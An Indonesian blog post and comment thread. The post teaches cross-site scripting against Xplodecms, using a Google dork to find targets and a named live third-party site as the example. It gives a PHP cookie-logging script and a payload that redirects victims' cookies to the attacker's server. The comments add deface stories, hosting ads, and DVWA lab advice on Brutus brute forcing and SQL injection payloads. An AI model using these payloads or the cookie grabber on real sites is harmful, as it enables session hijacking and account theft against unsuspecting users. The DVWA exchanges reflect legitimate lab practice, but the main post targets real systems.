Tidak ada kapok-kapoknya para web programmer di kerjain dengan bug basi XSS. Mungkin si admin malas membaca kode ulang programmnya sendiri, atau memang meragukan bugs XSS. XSS merupakan bugs yang low risk, tapi XSS bisa merupakan bugs yang bisa sangat merugikan, seperti Cookie Stealing, yang berakibat ancaman Session Hijacking yang membuat kita menjadi orang lain di aplikasi web yang credential, seperti web banking.
Umumnya, Cross site scripting adalah tehnik hacking yang memanfaatkan kelemahan koding dari web aplikasi, yang membuat attacker dapat mengirimkan kode jahatnya ke dalam web aplikasi, dan mengambil keuntungan dari korban. Selengkapnya baca di ……………
tulisan ini mengambil contoh pada aplikasi Xplodecms, untuk percobaan alihkan browser anda ke google.com untuk proof of concept. Ketikkan di dalam box “allinurl:module_wrapper.asp?wrap_script=” tanpa tanda kutip,
untuk mengecek web aplication tersebut vulnerable atau tidak kita cek dengan sintaks,
<script>alert(400191613824)</script>
lalu kita encode agar bisa diterjemahkan oleh browser menjadi,
<script%20%0a%0d>alert(400191613824)%3B</script>
Contoh ;
|
http://www.garforthrangers.co.uk/module_wrapper.asp?wrap_script= |
|---|
Lalu muncul pop-up seperti ini,
Cookie Stealing :
Bugs XSS bisa kita manfaatkan untuk mencuri identitas user yang sedang log-in di situs tersebut, tehnik ini dinamakan “Cookie Stealing”. Untuk melakukan Cookiestealing yang pertama kita buat script untuk mencatat cookies dengan nama “log.txt” dan kita chmod 777 untuk dapat ditulis, dan script untuk mengirimkan cookie ke server kita untuk dicatat.
Code grabcookie.php :
<?php
$cookie = $_GET['cookie'];
$log = fopen(“log.txt”, “a”);
fwrite($log, $cookie .”\n”);
fclose($log);
?>
Kita coba url berikut di address bar,
|
http://www.garforthrangers.co.uk/module_wrapper.asp?wrap_script= |
|---|
Lalu muncul pop-up seperti ini,
Sekarang kita catat cookie ke server kita, dengan script grabcookie.php yang kita buat sebelumnya,
|
<script>document.location=’http://situsgue.com/grabcookie.php? |
|---|
lalu kita coba ke target kita,
|
http://www.garforthrangers.co.uk/module_wrapper.asp?wrap_script= |
|---|
Jika aplikasi tersebut mencimpan cookie di server, maka cookie akan dikirim ke tempat dimana kita persiapkan sebelumnya, yaitu pada file “log.txt” Aplikasi web, seperti forum, guestbook, dan memperbolehkan user untuk log-in memungkinkan aplikasi tersebut menggunakan cookie, lalu kita asumsikan aplikasi web tersebut tidak terfilter dengan baik, maka attacker dapat memasukkan kode javascript seperti di atas untuk mencuri cookie.
reference :
www.crosssitescripting.com
Wah ga tahu tuh mas. tpi ap atu berguna juga wat google chrome? thanks ya udh mw kunjungin blog gwa. Tukeran link ya
udah ada bugsnya,, tapi untuk versi paling baru sudah tidak mempan, tukeran link ?? boleh,,
wedew,,, udah gak terinject tuh bos,, tadi ane coba gak bisa
yah,, berarti anda kurang beruntung mas,, silahkan coba lagi
mencari target juga membutuhkan waktu gak sedikit mas,, kalo mau tahu bugs2 baru, ikuti saja blog ini
hehehee
mmmm gw udah berhasil masukin xss di suatu situs bos, tapi pake alert js =D ,, setelah gw coba pake dokumen cookies kok gagal yak? hehe
ooh gitu,,hmm,, berarti situs tersebut pada proses input,, sudah tersanitasi oleh si admin,, tapi karakter belum,, dasar tuh admin,, makasih sudah bookmark blog ini, tunggu artikel saya selanjutnya
nambah lagi ah, iye gw ikutin terus, gw bookmark malahan wkwkwkwk biar gampang copas gitu deh hehe
jangan lupa kasih link ke sini bos,,,
udah nyoba mas , tp kok masih kosong ya di file vb.php. blm ada cookienya…thx..
eh maaf, di log.txtnya…
udah pastikah belum,, file permission log.txt nya 777…
wah lo gan main hacking mulu neh….
Lo tau FuckOn itu sapa???? ada yang deface website gw melalui register website .. tp untungnya ke tauan pas gw cek email sistem security…. gimana gan jadi ga NgE Hosting di Webhosting World Friend??? harga bersaing deh.. hahaha jangan Order asal2 aja…
hahaha http://hosting.worldfriend.web.id
walah, brabe donk,,full deface gak??? kaga tau gue,, paling preman kampung,,,wah belum ada duit gan,, masih suka yang gretongan,, wkakakka,,,
ga full deface…. cuman di Frontpage pada satu halamanya aja. dibilang gini :
HACKED
By FuKoCaN
Where Is Your Security ?
One Turk Against The World
pas googling ada sebuah website yang taruh tag hacking.. pas gw lihat kontentnya masih di hacking web worldfriend… atau di curi halamannya pas di deface sama dia…tp semua uda gw protek ke sistem IP and Security Proxy..pas di deface di ganti password adminnya untungkan gw bisa akalin… hahaha
Jangan lupa gan Lapak gw masih di buka neh sampai bulan besok untuk pendaftaran DOmain Baru cuman 65.000 aja .INFO . IN , .BIZ , .Web.id(khusus Domain Web.id Free Host gan)selama 1 tahun penuh untuk paket blog Webhosting World Friend
mangkanye update joomla loe,, oke gan tar kalo gue punya duit, sukses terus dah,,,
mas, nyari site yg vulnerable xss gmn y? udah gugling g dpt2 oi…thx
jangan nyoba kesitus orang aja dulu,, mendingan coba aplikasi web disini http://sourceforge.net/projects/dvwa/..
install xampp kalo windows, extrak aplikasinya trus install,,
trus coba berbagai macam bugs aplikasi berbasis web disitu.. bebas gak perlu kuatir ditangkep polisi..
nah aplikasi ntu tuh banyak banget bugsnya,, dikasih petunjuknya pula..
selamat mencoba…
makasih mas…
udah bisa sih nyobain dvwanya, tapi belum berhasil nyobain yang brute force dan sql injection, yang lain sih bisa, mas bisa nggak nyobain yang brute force dan sql injection…
makasih
kalo brute force,, coba pake brutus deh,,, kalo injection kan sama aja,,, nanti deh buat postingannya,,,
tanya dong mas..
1. Jadi brute force yang di dvwa itu ngetesnya pake brutus ya mas?
2. Brutus bisa diinstall di windows nggak sih mas?
3. Kl di dvwa itu nyobain sql injectionnya gmn sih mas?minta clue nya dong…udah nyoba2 semua cara yang saya tau gk bisa mas…
makasih…
yupp brutus bisa buat brute force mode “http form”,, brutus ada untuk windows kok,,, pakek karakter hexa udah ???
di tampilan brute force,targetnya diisi http://localhost/dvwa/vulnerabilities/brute/ gitu aja kan mas?
terus method httpnya dipilih get apa post mas?
passmodenya juga pilih yang mana mas?
terus di setting apa lagi mas?
saya blm berhasil2 nih mas..
makasih ….
yang sql injection pake karakter hexa gmn maksdnya mas….
kaya digambar ini ..
http://logsmylife.files.wordpress.com/2010/03/dvwa3.png?w=500
di gambar itu ,bagian mana yang menunjukkan username dan passwordnya berhasil ditemukan mas?
makasih.
hmm,,,maksudnya kita ngasih tau si brutus kalo bagian form username dan password yang akan kita injek dalam menebak username dan passwordnya… kalo di klik “Learn Form Settings” akan muncul field2 yang bisa kita brute force…
mmm, masih belum berhasil2 nih mas.
Makeknya gimana sih mas?
kok saya gk berhasil2. Di brutusnya malah ditemuin password yang salah.Udah cb2 pakai metode wordlist sama brute force sih.Di file wordlistnya malah udah saya tulis password yang sebenarnya, tapi brutusnya tetap gak bs nemuin, dan malah nemuin password yang salah. Sebenarnya make brutus dg web target dvwa itu gimana sih mas? makasih bgt atas bantuannya…
bisa mas,,, sabar aja.. metodenya pake GET atau POST ??
bisa kok,, cuma tambah kesabaran dikit aja,, metode yang dipake apa GET atau POST ?
hehe…sori mas , terburu nafsu nih..penting soalnya..kl mas pakeknya GET ya?saya udah coba GET maupun POST.minta rincian settingannya dong mas?
Kl rincian saya gini :
Target:http://localhost/dvwa/vulnerabilities/brute/
Type:HTML (Form)
port:80
Connections:10
Timeout:10
Method:GET
Keepalive:cheklist
Fakecookies:checklist
Encode:checklist
singleuser:checklist=isinya admin
Passmode:Wordlist
Pass file:words.txt
Pada HTML form authentication definition, targetnya =http://localhost/dvwa/vulnerabilities/brute/ ,tp tidak mau diklik Learn Form Settingsnya.
Udah,setelah itu diklik Start, tetapi yang muncul malah password yang salah mas…
ada yg salah dg settingan saya mas?
minta rincian settingannya dong mas?
makasih banyak.
hmmm ituu,, targetnya belum tepat, karena kita pake HTML form authentication, maka kita juga harus ngasih tau letak skrip yang mau di brute force mana,,, jadi kalo contoh digambar http://localhost/dvwa/brute.php
dan kita pake metode POST,,, karena gak ada form login dengan metode GET…
sama-sama karna sudah berkunjung..
mas pake dvwa yang versi sebelumnya ya?kl saya pake yang versi 1.0.6. jd linknya ke localhost/dvwa/vulnerabilities/brute/index.php. Tp tetep aja mas, yang ditampilin password yang salah. Malah yang di pass mode sya pilih brute force, dan password sebenarnya udah saya ganti cuma 1 karakter dan range brute forcenya min dan max karakternya saya isi 1 karakter, tetep aan laja brutusnya nampilin password yang salah.Apa karena brute force yang di dvwa versi saya tidak bisa dipakai ya? kl gt boleh minta dvwa versi yang mas punya gk?saya nyari2 yang versi sblm 1.0.6 gk dpt2 mas.Atau ada saran lain? makasih…
oh gitu,, yaudah tar aye donlod lagi,, mau ngoprek2.. lagi sibuk buat artikel di kampus
blog jadi gak ke updet… imm169@yahoo.com
oya, boleh mita YM /messenger nya gk?makasih…
mas, kl nyobain sql innjectionnya dvwa gimana sih?
maaf mas kl nanya terus…hehe..makasih…
gak pape bos,,makasih juga atas kunjungannya.. nanti aje ye,, gw buat postingan tentang ini… okeh…
kl minta cluenya aja bisa mas? Soalnya keburu nih mas, buat tugas. Semua code yang saya tau sudah sya masukkan ke sql injectionnya dvwa tp gk berhasil mas…makasih..
cara error based seperti
http://localhost/dvwa16/vulnerabilities/sqli/?id=1%27&Submit=Submit#
untuk security low level udah ??
udah mas, sampai munculin pesan error itu kan?cm sampai itu doang mas saya bisanya,blm bs langkah selanjutnya.lantas?…makasih
oh itu blind sql injection,,, menggunakan kondisi true atau false,,, seperti http://logsmylife.wordpress.com/2009/09/04/tutorial-teknik-exploitasi-web-application-dengan-blind-sql-injection/
DVWAnya saya tes kondisi true seperti ditunjukkan artikel tersebut dg mengetik :2 and 1=1 hasilnya halaman tidak error(true) tetapi saya ketik 2 and 1=2 juga halamannya tidak berubah(true juga).Duaduanya tetap memunculkan nama user yang id-nya 2. Terus saya cek nama usernya dg
2 and mid(user(),1,1)=CHAR(98)dan
2 and mid(user(),1,1)=CHAR(97),tidak berhasil juga,duaduanya tidak menghasilkan halaman yang error mas.
ngecek versi mysqlnya jg gak berhasil mas,
dg 2+and+substring(@@version,1,1)=5
dan 2+and+substring(@@version,1,1)=4
duaduanya menghasilkan halaman yang tidak error (true).
mungkin mas lebih tau?
Terima kasih…
oya mas, di helpnya dvwa ditulis If you have received a Magicquotes error, turn them off in php.ini. Ini mksdnya gmn ya mas? Mksdnya php.ini nya dvwa apa php.ini nya xampp mas? padahal magicquote error sudah saya off kan php.ini di keduanya(xampp & dvwa),kok masih sama saja.Atau mas lebih ngerti maksudnya…
makasih…maaf bertanya terus mas,pengin menggali ilmu soalnya.
maaf mas saya gak sempet buka dvwa,, nanti saya coba lagi,,, masalah magic quote itu mengamankan datanya dengan nge-sanitize query-query ke dalam database.. magic_quotes_gpc di xampp di on saja…
mau nanyain mas gmn nyobain dvwanya kmrn?
Terima kasih.
maaf mas, nanya terus…
sql injectionnya di dvwa itu memang bisa dicoba untuk mencuri username dan password ya?
terima kasih…
Ko pake maf, tenang aja kalo mampu saya jawab. Kemarin testing,logika bisa. Cuma belum sempet nemuin POC nya, nanti gw publish, mas juga share ke gw ye,kalo dapet..Okeh.
Mas,besok2 kalo mampir,komenya yang dihalaman pertama aja,.
POC apaan mas?
Logika bisa maksdny?
Ok, ntar kl ak bisa ak ksh tw deh..
Dihalaman pertama di mana mas?mksdnya di http://logsmylife.wordpress.com ?kok gk ada t4 buat kasih comment di hal pertama mas?
THX
POC maksudnya proof of concept, jadi eksploitasinya bagaimana ?? maksud komennya di postingan yang laen,, begitu,, biar rame,,
mas, cara lihat versi mysql dg SQL injection di dvwa gmn sih?
yg pake @@version itu lho…saya kok gk bs terus.THX.
hehe,,, silahkan bongkar isi kodenya,, dan bereksplorasilah
mas, kl source code dan database saya ini(http://rapidshare.com/files/386459207/Archive.rar.html) kok dideteksi berapa kolom yang ada kok tidak bisa y, padahal saya buat kolomny berjumlah 6 tetapi kok sya tes dengan cara ini
http://www.target.com/news.php?id=1+order+by+1– // tidak ada error
http://www.target.com/news.php?id=1+order+by+2– // tidak ada error
http://www.target.com/news.php?id=1+order+by+3– // tidak ada error
http://www.target.com/news.php?id=1+order+by+4– // tidak ada error
http://www.target.com/news.php?id=1+order+by+5– // tidak ada error
http://www.target.com/news.php?id=1+order+by+6– // tidak ada error
http://www.target.com/news.php?id=1+order+by+7– // tidak ada error
bahkan saya coba sampai order by 30- , tetapi tetap tidak ada error
padahal harusnya ada error kan jika diberi masukan
http://www.target.com/news.php?id=1+order+by+7– //seharusnya ada error yang muncul seperti “Unknown column ’7′ in ‘order clause’”, tetapi ternyata tidak mumcul error,
hal ini apa penyebabnya mas?
saya kok selalu berhenti pada tahap ini mas?
satusatunya tahap yang bisa saya lewati kok cm tahap mengetahui apakah suatu aplikasi web vulnerable terhadap Sql Injection atau tidak, dengan
http://www.target.com/news.php?id=1‘ yang memunculkan error You have an error in your SQL syntax; check the manual the …bla-bla…
Source yang mas berikan juga sama mas, hanya berhasil sampai mengetahui apakah suatu aplikasi web vulnerable terhadap Sql Injection atau tidak dengan
http://www.target.com/news.php?id=1‘ yang memunculkan error You have an error in your SQL syntax; check the manual the …bla-bla…
selanjutnya mengecek jml kolom seperti dg order by 1-,order by 2-.. bla.bla..bla tidak berhasil.
Mas bisa nggak kasih tau source sederhana seperti yang mas kasih yang bisa diserang sqlinejction tetapi yang lengkap, bukan sepotong-sepotong.juga kl bisa disertakan databasenya.
sederhana saja gak papa mas, tetapi lengkap.Terima kasih banyak mas.maaf tanya terus.makasih…
okeh,,, nanti ane cariin bekel dah,, aplikasi lengkap source source code buat belajar injek-injek yang mudah..
eh, maaf double post